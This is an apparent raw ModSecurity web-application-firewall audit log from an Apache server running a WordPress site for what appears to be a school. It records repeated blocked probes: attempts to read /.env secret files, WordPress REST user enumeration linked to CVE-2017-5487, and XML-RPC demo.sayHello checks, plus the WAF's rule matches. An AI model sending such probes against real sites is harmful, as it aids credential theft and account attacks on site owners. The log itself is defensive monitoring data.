Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745594365184642 2558 (- - -) Stopwatch2: 1745594365184642 2558; combined=1211, p1=400, p2=782, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d186fa28-Z-- --aa447359-A-- [25/Apr/2025:22:24:49 +0700] aAupQeOdEP6frSVs8Cq6owAAABU 103.236.140.4 50628 103.236.140.4 8181 --aa447359-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.39 Safari/537.36 Accept-Charset: utf-8 --aa447359-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa447359-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745594689613208 825 (- - -) Stopwatch2: 1745594689613208 825; combined=349, p1=315, p2=0, p3=0, p4=0, p5=34, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa447359-Z-- --06471c78-A-- [25/Apr/2025:22:59:06 +0700] aAuxSuXF4ZX3hX-IbN4b2gAAAJA 103.236.140.4 49256 103.236.140.4 8181 --06471c78-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 200.211.3.152 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 200.211.3.152 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --06471c78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --06471c78-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745596746246451 3147 (- - -) Stopwatch2: 1745596746246451 3147; combined=1307, p1=420, p2=854, p3=0, p4=0, p5=33, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --06471c78-Z-- --31f4086c-A-- [25/Apr/2025:23:05:26 +0700] aAuyxuOdEP6frSVs8CrCbAAAAAU 103.236.140.4 56306 103.236.140.4 8181 --31f4086c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 41.170.88.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 41.170.88.195 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --31f4086c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --31f4086c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745597126104948 2660 (- - -) Stopwatch2: 1745597126104948 2660; combined=1130, p1=410, p2=696, p3=0, p4=0, p5=24, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --31f4086c-Z-- --3414275d-A-- [25/Apr/2025:23:43:19 +0700] aAu7p_Ku9d5eAb6Kn998LAAAAM8 103.236.140.4 50914 103.236.140.4 8181 --3414275d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 182.176.2.37 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.176.2.37 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3414275d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3414275d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745599399552532 2696 (- - -) Stopwatch2: 1745599399552532 2696; combined=1217, p1=405, p2=783, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3414275d-Z-- --d3f49b71-A-- [26/Apr/2025:00:14:03 +0700] aAvC2-XF4ZX3hX-IbN400AAAAJU 103.236.140.4 60286 103.236.140.4 8181 --d3f49b71-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.54 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.54 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d3f49b71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3f49b71-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745601243695906 19897 (- - -) Stopwatch2: 1745601243695906 19897; combined=4676, p1=3539, p2=1110, p3=0, p4=0, p5=27, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3f49b71-Z-- --7949df1f-A-- [26/Apr/2025:00:14:06 +0700] aAvC3vKu9d5eAb6Kn9-NlwAAAME 103.236.140.4 60462 103.236.140.4 8181 --7949df1f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.54 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.54 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7949df1f-C-- demo.sayHello --7949df1f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7949df1f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745601246730385 6331 (- - -) Stopwatch2: 1745601246730385 6331; combined=4596, p1=540, p2=3669, p3=31, p4=35, p5=210, sr=74, sw=111, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7949df1f-Z-- --c89ca13b-A-- [26/Apr/2025:00:21:50 +0700] aAvErj8HMZgF-3Y3GtHhTwAAAE8 103.236.140.4 59650 103.236.140.4 8181 --c89ca13b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 115.127.33.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 115.127.33.97 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c89ca13b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c89ca13b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745601710652239 2156 (- - -) Stopwatch2: 1745601710652239 2156; combined=948, p1=307, p2=617, p3=0, p4=0, p5=24, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c89ca13b-Z-- --a16f9c59-A-- [26/Apr/2025:00:44:56 +0700] aAvKGPKu9d5eAb6Kn9-o5AAAAM4 103.236.140.4 59622 103.236.140.4 8181 --a16f9c59-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.174.188 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.174.188 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a16f9c59-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a16f9c59-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745603096723908 2969 (- - -) Stopwatch2: 1745603096723908 2969; combined=1309, p1=427, p2=849, p3=0, p4=0, p5=33, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a16f9c59-Z-- --97af8425-A-- [26/Apr/2025:00:44:59 +0700] aAvKG-OdEP6frSVs8CoBmQAAAAU 103.236.140.4 59810 103.236.140.4 8181 --97af8425-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.174.188 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.174.188 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --97af8425-C-- demo.sayHello --97af8425-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --97af8425-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745603099571366 5500 (- - -) Stopwatch2: 1745603099571366 5500; combined=3947, p1=500, p2=3197, p3=29, p4=32, p5=110, sr=66, sw=79, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --97af8425-Z-- --70365048-A-- [26/Apr/2025:01:23:01 +0700] aAvTBT8HMZgF-3Y3GtEPBgAAAFg 103.236.140.4 36040 103.236.140.4 8181 --70365048-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 61.228.136.45 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 61.228.136.45 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --70365048-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --70365048-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745605381147188 3011 (- - -) Stopwatch2: 1745605381147188 3011; combined=1348, p1=473, p2=838, p3=0, p4=0, p5=37, sr=127, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70365048-Z-- --aaef6f40-A-- [26/Apr/2025:01:26:41 +0700] aAvT4T8HMZgF-3Y3GtEP-AAAAE0 103.236.140.4 41310 103.236.140.4 8181 --aaef6f40-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.239.52.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.239.52.230 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --aaef6f40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aaef6f40-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745605601479274 1858 (- - -) Stopwatch2: 1745605601479274 1858; combined=887, p1=278, p2=590, p3=0, p4=0, p5=19, sr=46, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aaef6f40-Z-- --eeeb2670-A-- [26/Apr/2025:01:31:02 +0700] aAvU5vKu9d5eAb6Kn9_G_QAAAMM 103.236.140.4 47814 103.236.140.4 8181 --eeeb2670-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.42.62 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.42.62 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --eeeb2670-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eeeb2670-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745605862309741 22159 (- - -) Stopwatch2: 1745605862309741 22159; combined=4968, p1=3687, p2=1242, p3=0, p4=0, p5=38, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eeeb2670-Z-- --d84fa25e-A-- [26/Apr/2025:01:31:05 +0700] aAvU6T8HMZgF-3Y3GtESVAAAAE4 103.236.140.4 47894 103.236.140.4 8181 --d84fa25e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.42.62 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.42.62 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d84fa25e-C-- demo.sayHello --d84fa25e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d84fa25e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745605865339971 7226 (- - -) Stopwatch2: 1745605865339971 7226; combined=5129, p1=718, p2=4107, p3=48, p4=42, p5=122, sr=139, sw=92, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d84fa25e-Z-- --1076e374-A-- [26/Apr/2025:01:57:07 +0700] aAvbA_Ku9d5eAb6Kn9_RSwAAANU 103.236.140.4 57636 103.236.140.4 8181 --1076e374-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 186.227.212.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 186.227.212.161 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1076e374-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1076e374-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745607427449611 2630 (- - -) Stopwatch2: 1745607427449611 2630; combined=1273, p1=415, p2=821, p3=0, p4=0, p5=37, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1076e374-Z-- --8dd7507e-A-- [26/Apr/2025:02:07:09 +0700] aAvdXeOdEP6frSVs8Cov3QAAAAc 103.236.140.4 59992 103.236.140.4 8181 --8dd7507e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.68.194.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.68.194.166 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8dd7507e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8dd7507e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745608029554731 2859 (- - -) Stopwatch2: 1745608029554731 2859; combined=1530, p1=486, p2=1007, p3=0, p4=0, p5=36, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8dd7507e-Z-- --f103935e-A-- [26/Apr/2025:02:08:36 +0700] aAvdtOXF4ZX3hX-IbN51bQAAAIg 103.236.140.4 60324 103.236.140.4 8181 --f103935e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.166.26.208 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.166.26.208 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f103935e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f103935e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745608116599973 3229 (- - -) Stopwatch2: 1745608116599973 3229; combined=1615, p1=557, p2=1011, p3=0, p4=0, p5=47, sr=161, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f103935e-Z-- --66a56346-A-- [26/Apr/2025:02:25:29 +0700] aAvhqeOdEP6frSVs8CoxGwAAAAI 103.236.140.4 36004 103.236.140.4 8181 --66a56346-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.240.99.71 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.240.99.71 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --66a56346-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --66a56346-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file 